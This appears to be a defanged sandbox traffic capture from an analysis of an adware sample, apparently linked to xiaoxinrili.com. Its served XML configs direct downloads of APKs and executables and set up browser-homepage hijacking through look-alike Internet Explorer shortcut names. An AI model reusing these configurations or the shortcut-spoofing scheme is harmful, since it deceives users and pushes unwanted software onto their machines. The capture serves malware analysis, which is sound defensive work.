GET /stat.htm?id=5614889&r=&lg=en-us&ntime=none&cnzz_eid=808136781-1421233891-&showp=1276x846&t=&h=1&rnd=531066514 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/jsq/tj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hzs10.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Wed, 14 Jan 2015 11:51:56 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..



GET /stat.php?id=4881483&web_id=4881483 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/qian.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s19.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:51:30 GMT
Last-Modified: Wed, 14 Jan 2015 11:51:30 GMT
Cache-Control: max-age=5400,s-maxage=5400
X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:31 GMT
X-Swift-CacheTime: 5399
Via: cache7.de1[1596,200-0,M], cache5.de1[1597,0]
2758..(function(){function k(){this.c="4881483";this.R="z";this.N="";t
his.K="";this.M="";this.r="1421236290";this.P="hzs19.cnzz.com";this.L=
"";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnz
z_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};th
is.la()}function g(a,b){try{var c=.[];c.push("siteid=4881483");c.push(
"name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referre
r));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.u
serAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math
.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&
")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURI
Component,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),
this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),th
is.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),thi
s.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i fai
led")}},oa:function(){try{var a=this;e._czc={push:function(){return a.
B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{v
ar a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<
;a.length;b  ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_accoun
t="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;
case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c
[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===
typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c
<<< skipped >>>

GET /stat.php?id=4878044&web_id=4878044 HTTP/1.1


Accept: */*
Referer: hXXp://update.xiaoxinrili.com/tj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s19.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 10072
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:01:38 GMT
Last-Modified: Wed, 14 Jan 2015 11:01:38 GMT
Cache-Control: max-age=5400,s-maxage=5400
Age: 2993
X-Cache: HIT TCP_MEM_HIT dirn:7:784156534
X-Swift-SaveTime: Wed, 14 Jan 2015 11:01:38 GMT
X-Swift-CacheTime: 5400
Via: cache1.de1[0,200-0,H], cache5.de1[1,0]
(function(){function k(){this.c="4878044";this.R="z";this.N="";this.K=
"";this.M="";this.r="1421233298";this.P="hzs19.cnzz.com";this.L="";thi
s.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" 
this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la(
)}function g(a,b){try{var c=.[];c.push("siteid=4878044");c.push("name=
" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.
push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAge
nt));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.rando
m()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}cat
ch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURICompon
ent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J
(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j()
,this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa()
,e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}
},oa:function(){try{var a=this;e._czc={push:function(){return a.B.appl
y(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e
._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.len
gth;b  ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[ob
ject String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "
_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}
}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof
 e._cz_account||e._cz_account===this.c){e._cz_account=this.c;if("[
<<< skipped >>>


GET /InstProtect.txt HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 19 Nov 2014 07:54:35 GMT
Accept-Ranges: bytes
ETag: "cbc3f6fce3d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:37 GMT
Content-Length: 1
0HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Wed, 19 Nov
 2014 07:54:35 GMT..Accept-Ranges: bytes..ETag: "cbc3f6fce3d01:0"..Ser
ver: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 
11:53:37 GMT..Content-Length: 1..0..



GET /core.php?web_id=4878044&t=z HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/tj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 751
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:51:33 GMT
Last-Modified: Wed, 14 Jan 2015 11:51:33 GMT
Expires: Wed, 14 Jan 2015 12:06:33 GMT
X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:33 GMT
X-Swift-CacheTime: 900
Via: cache10.de1[1721,200-0,M], cache3.de1[1722,0]
!function(){var p,q,r,a=encodeURIComponent,b="4878044",c="",d="",e="on
line_v3.php",f="hzs19.cnzz.com",g="1",h="text",i="z",j="站໳
1;统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0
",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f
),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.c
allRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScr
iptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web
_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img
/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><i
mg border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a hre
f='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon
([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application
/javascript..Content-Length: 751..Connection: keep-alive..Date: Wed, 1
4 Jan 2015 11:51:33 GMT..Last-Modified: Wed, 14 Jan 2015 11:51:33 GMT.
.Expires: Wed, 14 Jan 2015 12:06:33 GMT..X-Cache: MISS TCP_REFRESH_MIS
S dirn:-2:-2..X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:33 GMT..X-Swift
-CacheTime: 900..Via: cache10.de1[1721,200-0,M], cache3.de1[1722,0]..!
function(){var p,q,r,a=encodeURIComponent,b="4878044",c="",d="",e="onl
ine_v3.php",f="hzs19.cnzz.com",g="1",h="text",i="z",j="站长
;统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0"
,n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f)
,o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&
<<< skipped >>>

GET /core.php?web_id=1253322244&t=z HTTP/1.1


Accept: */*
Referer: hXXp://down.xiaoxinrili.com/hezi/xxurl.html?iexplore.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 751
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:51:39 GMT
Last-Modified: Wed, 14 Jan 2015 11:51:39 GMT
Expires: Wed, 14 Jan 2015 12:06:39 GMT
X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:39 GMT
X-Swift-CacheTime: 900
Via: cache9.de1[1208,200-0,M], cache3.de1[1209,0]
!function(){var p,q,r,a=encodeURIComponent,b="1253322244",c="",d="",e=
"online_v3.php",f="z9.cnzz.com",g="1",h="text",i="z",j="站໳
1;统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0
",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f
),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.c
allRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScr
iptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web
_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img
/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><i
mg border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a hre
f='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon
([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application
/javascript..Content-Length: 751..Connection: keep-alive..Date: Wed, 1
4 Jan 2015 11:51:39 GMT..Last-Modified: Wed, 14 Jan 2015 11:51:39 GMT.
.Expires: Wed, 14 Jan 2015 12:06:39 GMT..X-Cache: MISS TCP_REFRESH_MIS
S dirn:-2:-2..X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:39 GMT..X-Swift
-CacheTime: 900..Via: cache9.de1[1208,200-0,M], cache3.de1[1209,0]..!f
unction(){var p,q,r,a=encodeURIComponent,b="1253322244",c="",d="",e="o
nline_v3.php",f="z9.cnzz.com",g="1",h="text",i="z",j="站长
统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",
n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),
o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k
<<< skipped >>>

GET /core.php?web_id=5614889&t=z HTTP/1.1


Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/jsq/tj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 749
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:49:49 GMT
Last-Modified: Wed, 14 Jan 2015 11:49:49 GMT
Expires: Wed, 14 Jan 2015 12:04:49 GMT
Age: 126
X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:49:49 GMT
X-Swift-CacheTime: 900
Via: cache5.de1[0,200-0,H], cache3.de1[0,0]
!function(){var p,q,r,a=encodeURIComponent,b="5614889",c="",d="",e="on
line_v3.php",f="z12.cnzz.com",g="1",h="text",i="z",j="站长
统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",
n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),
o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.cal
lRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScrip
tIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_i
d=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/"
 c ".gif",p="<a href='" q "' target=_blank title='" j "'><img
 border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href=
'" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([
p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application/j
avascript..Content-Length: 749..Connection: keep-alive..Date: Wed, 14 
Jan 2015 11:49:49 GMT..Last-Modified: Wed, 14 Jan 2015 11:49:49 GMT..E
xpires: Wed, 14 Jan 2015 12:04:49 GMT..Age: 126..X-Cache: HIT TCP_MEM_
HIT dirn:-2:-2..X-Swift-SaveTime: Wed, 14 Jan 2015 11:49:49 GMT..X-Swi
ft-CacheTime: 900..Via: cache5.de1[0,200-0,H], cache3.de1[0,0]..!funct
ion(){var p,q,r,a=encodeURIComponent,b="5614889",c="",d="",e="online_v
3.php",f="z12.cnzz.com",g="1",h="text",i="z",j="站长ಯ
9;计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "/
/online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push
("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callR
<<< skipped >>>


GET /stat.php?id=1253322244 HTTP/1.1
Accept: */*
Referer: hXXp://down.xiaoxinrili.com/hezi/xxurl.html?iexplore.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s5.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:51:37 GMT
Last-Modified: Wed, 14 Jan 2015 11:51:37 GMT
Cache-Control: max-age=5400,s-maxage=5400
Cache-Control: max-age=5400,s-maxage=5400
X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:38 GMT
X-Swift-CacheTime: 5399
Via: cache10.de1[1016,200-0,M], cache6.de1[1017,0]
2d3..(function(){function k(){this.c="1253322244";this.R="z";this.N=""
;this.K="";this.M="";this.r="1421236297";this.P="z9.cnzz.com";this.L="
";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz
_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};thi
s.la()}function g(a,b){try{var c=.[];c.push("siteid=1253322244");c.pus
h("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.refer
rer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator
.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Ma
th.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join(
"&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeU
RIComponent,n=unescape,p=esc..2488..ape;k.prototype={la:function(){try
{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),th
is.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),thi
s.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){
g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function()
{return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:functi
on(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(va
r b=0;b<a.length;b  ){var c=a[b];switch(c[0]){case "_setAccount":e.
_cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1
]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_auto
Pageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("und
efined"===typeof e._cz_account||e._cz_account===this.c){e._cz_acco
<<< skipped >>>


GET /files/conn_engine/2.69.0.5490.zip HTTP/1.1
Range: bytes=0-
User-Agent: WDJConnEngine
Host: dl.cdn.wandoujia.com
Cache-Control: no-cache
Connection: Keep-Alive


HTTP/1.1 302 Found
Server: Tengine/1.4.6
Date: Wed, 14 Jan 2015 11:51:35 GMT
Content-Type: text/html
Content-Length: 266
Connection: keep-alive
Location: hXXp://fw1.dl.wdjcdn.com/files/conn_engine/2.69.0.5490.zip
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>
..<head><title>302 Found</title></head>..<b
ody bgcolor="white">..<h1>302 Found</h1>..<p>The 
requested resource resides temporarily under a different URI.</p>
;..<hr/>Powered by Tengine/1.4.6..</body>..</html>..
HTTP/1.1 302 Found..Server: Tengine/1.4.6..Date: Wed, 14 Jan 2015 11:5
1:35 GMT..Content-Type: text/html..Content-Length: 266..Connection: ke
ep-alive..Location: hXXp://fw1.dl.wdjcdn.com/files/conn_engine/2.69.0.
5490.zip..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..&l
t;html>..<head><title>302 Found</title></head&
gt;..<body bgcolor="white">..<h1>302 Found</h1>..<
;p>The requested resource resides temporarily under a different URI
.</p>..<hr/>Powered by Tengine/1.4.6..</body>..</
html>....



GET /c.php?id=30085361&l=3 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: w.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 10074
Connection: keep-alive
Date: Wed, 14 Jan 2015 10:54:51 GMT
Last-Modified: Wed, 14 Jan 2015 10:54:51 GMT
Cache-Control: max-age=5400,s-maxage=5400
Age: 3385
X-Cache: HIT TCP_MEM_HIT dirn:6:242871715
X-Swift-SaveTime: Wed, 14 Jan 2015 10:54:52 GMT
X-Swift-CacheTime: 5399
Via: cache5.de1[0,200-0,H], cache2.de1[0,0]
(function(){function k(){this.c="30085361";this.R="q";this.N="";this.K
="3";this.M="";this.r="1421232891";this.P="hqs5.cnzz.com";this.L="";th
is.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV"
 this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la
()}function g(a,b){try{var c=.[];c.push("siteid=30085361");c.push("nam
e=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));
c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userA
gent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.ran
dom()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}c
atch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComp
onent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this
.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j
(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa
(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed"
)}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.ap
ply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a
=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.l
ength;b  ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[
object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case
 "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])
}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===type
of e._cz_account||e._cz_account===this.c){e._cz_account=this.c;if(
<<< skipped >>>


GET /ico/Icon_1.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA1253322244=307117902-1421236297-|1421236297


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 14 Jan 2015 11:51:42 GMT
Content-Type: image/x-icon
Content-Length: 97527
Cache-Control: max-age=1200
Last-Modified: Sat, 31 Aug 2013 07:53:06 GMT
Cache-by-CoreNode: HIT From cha-ld-mgslb-sdwf-core1-mnd1
Cache-by-Node: HIT From cha-ld-lnmas-cs1-nd4
Accept-Ranges: bytes
......00......h.......  ..........>...............&...........(....
...00..........6...  ...........................$..........h...N .....
... ......0..00.... ..%...8..  .... ....._^........ ......o........ .h
....x..(...0...`......................................................
......................................................................
;8.......................{.p........................p.................
;p.....................................................|f...lh........
........F....nn.F.........;....F.n......lg............Fl..........@...
....;..t..n~x......fDp......y..Fl........~.lf..........df.n~~.....g..D
.........f.l....fn.~.l.d..........l....W.un.............vlf...@.....~N
ld`......;.ldl.......n...f@p.......f.n.W.....V..ld@.......;VdFl`......
wwwwwp.......<fl.p.....................F.@.................8..f.fgg
gggggfvfVF......{..vFF........lfF@B.....w.8.ddn......nf.dd......{x..FF
Fn.......f.d......s...6FF.nlv.~nf.fF.......7...d.gGvvvllvf.BG.........
.Vp........ffd.......kx..v......v.f.vD.......G;...@.....nn.ffd0.....@d
w..{7.....lv..l`.......$g8...p....nl~fvd........fs...4p..g....l.......
..dg{.{.fFGnv..vv@.......pwfwx..wwvw.~w............wg........w.vG.....
.....w.w.......xx.p..........F...........G...........pH....{x...D.....
........pH.......D...............pw.....e..................vwwx.p.....
...........................................{.....p....................
........................{;p...........................................
...............................?..........................?.......
<<< skipped >>>


GET /stat.htm?id=5467330&r=&lg=en-us&ntime=none&cnzz_eid=1312808906-1421232890-&showp=1276x846&t=&h=1&rnd=2027361058 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hzs23.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Wed, 14 Jan 2015 11:51:22 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..



GET /daohang/sj.xml HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896


HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 30 Oct 2014 05:23:23 GMT
Accept-Ranges: bytes
ETag: "d443d39f1f4cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:34 GMT
Content-Length: 637
<?xml version="1.0" encoding="gb2312"?>..<root>.. <item
 id="0" off="1" opentime="60" gettime="1440" jiange="3600" shu="3">
</item>.. <item id="1" name="hao123" Ads_Url="hXXp://down.xia
oxinrili.com/bao/appHao123_AndroidPhone_v4.7.2.0(4.7.2.0)_1002041t.apk
" Ads_Exe="appHao123_AndroidPhone_v4.7.2.0(4.7.2.0)_1002041t.apk" Ads_
Param="" ads_img=""></item>..<item id="2" name="........" 
Ads_Url="hXXp://down.xiaoxinrili.com/bao/9YaoForAndroid.apk" Ads_Exe="
9YaoForAndroid.apk" Ads_Param="" ads_img=""></item>..<item
 id="3" name="360......" Ads_Url="hXXp://cnrdn.com/cnBF" Ads_Exe="360m
se_H081067.apk" Ads_Param="" ads_img=""></item>..</root>
;....


GET /daohang/yx.xml HTTP/1.1


User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896


HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 07 Sep 2014 09:12:59 GMT
Accept-Ranges: bytes
ETag: "20fdeeb7bcacf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:34 GMT
Content-Length: 305
<?xml version="1.0" encoding="gb2312"?>..<root>.. <item
 id="0" off="0" opentime="1800" gettime="1440" jiange="3600" shu="1" q
udaono="" is_quit="0"></item>.. <item id="1" name=".......
." Ads_Url="hXXp://down.xiaoxinrili.com/bizhi/01/tt0905.exe" Ads_Exe="
tt0905.exe" Ads_Param="" ads_img=""></item>..</root>ont>....


GET /daohang/tubiao.xml HTTP/1.1


User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896


HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 14 Jan 2015 08:26:54 GMT
Accept-Ranges: bytes
ETag: "2ae5d5dad32fd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:35 GMT
Content-Length: 2263
<?xml version="1.0" encoding="gb2312"?>..<root>..<item 
tid="0" toff="1" topentime="400" tgettime="1200" tjiange="3600" tshu="
3" offone="1" byday="0" IENAV_PElnkisC="0" IENAV_PElnkurl="hXXp://hao.
360.cn/?src=lm&ls=n162f37fb94" IENAV_shell_time="10"  IENAV_PElnkname=
"1nternet Exploert.lnk" IENAV_PElnkico="hXXp://down.xiaoxinrili.com/ic
o/Icon_1.ico" IENAV_shell="1" IENAV_shell_changelist="3600.........lnk
,Internet Sulierie.lnk,Internet Explorers.lnk,Internet KuaipIE.lnk,hao
123.........lnk,Intarnat Explarer.lnk,Internet  Eslangie.lnk,Internet 
Expubie.lnk,Internet .Hao360..lnk,Internet Eslangie.lnk,Internet Explo
rers.lnk,Internet KuaipIE.lnk,1ntrenet Hao.123..lnk,Internet Exp1orer.
lnk,Internet   Hao123  .lnk,Internet  Hao360.lnk,Internet Explorer.lnk
,3600.........lnk,360.........lnk, 1nternot Hao123s.lnk, Internor Hao1
23.lnk, 1nternot Hao123.lnk,360..........6.lnk,360.........lnk,1nterne
t .Hao360..lnk,1nternet Explorer.lnk,Internet     Explorer.lnk,Interne
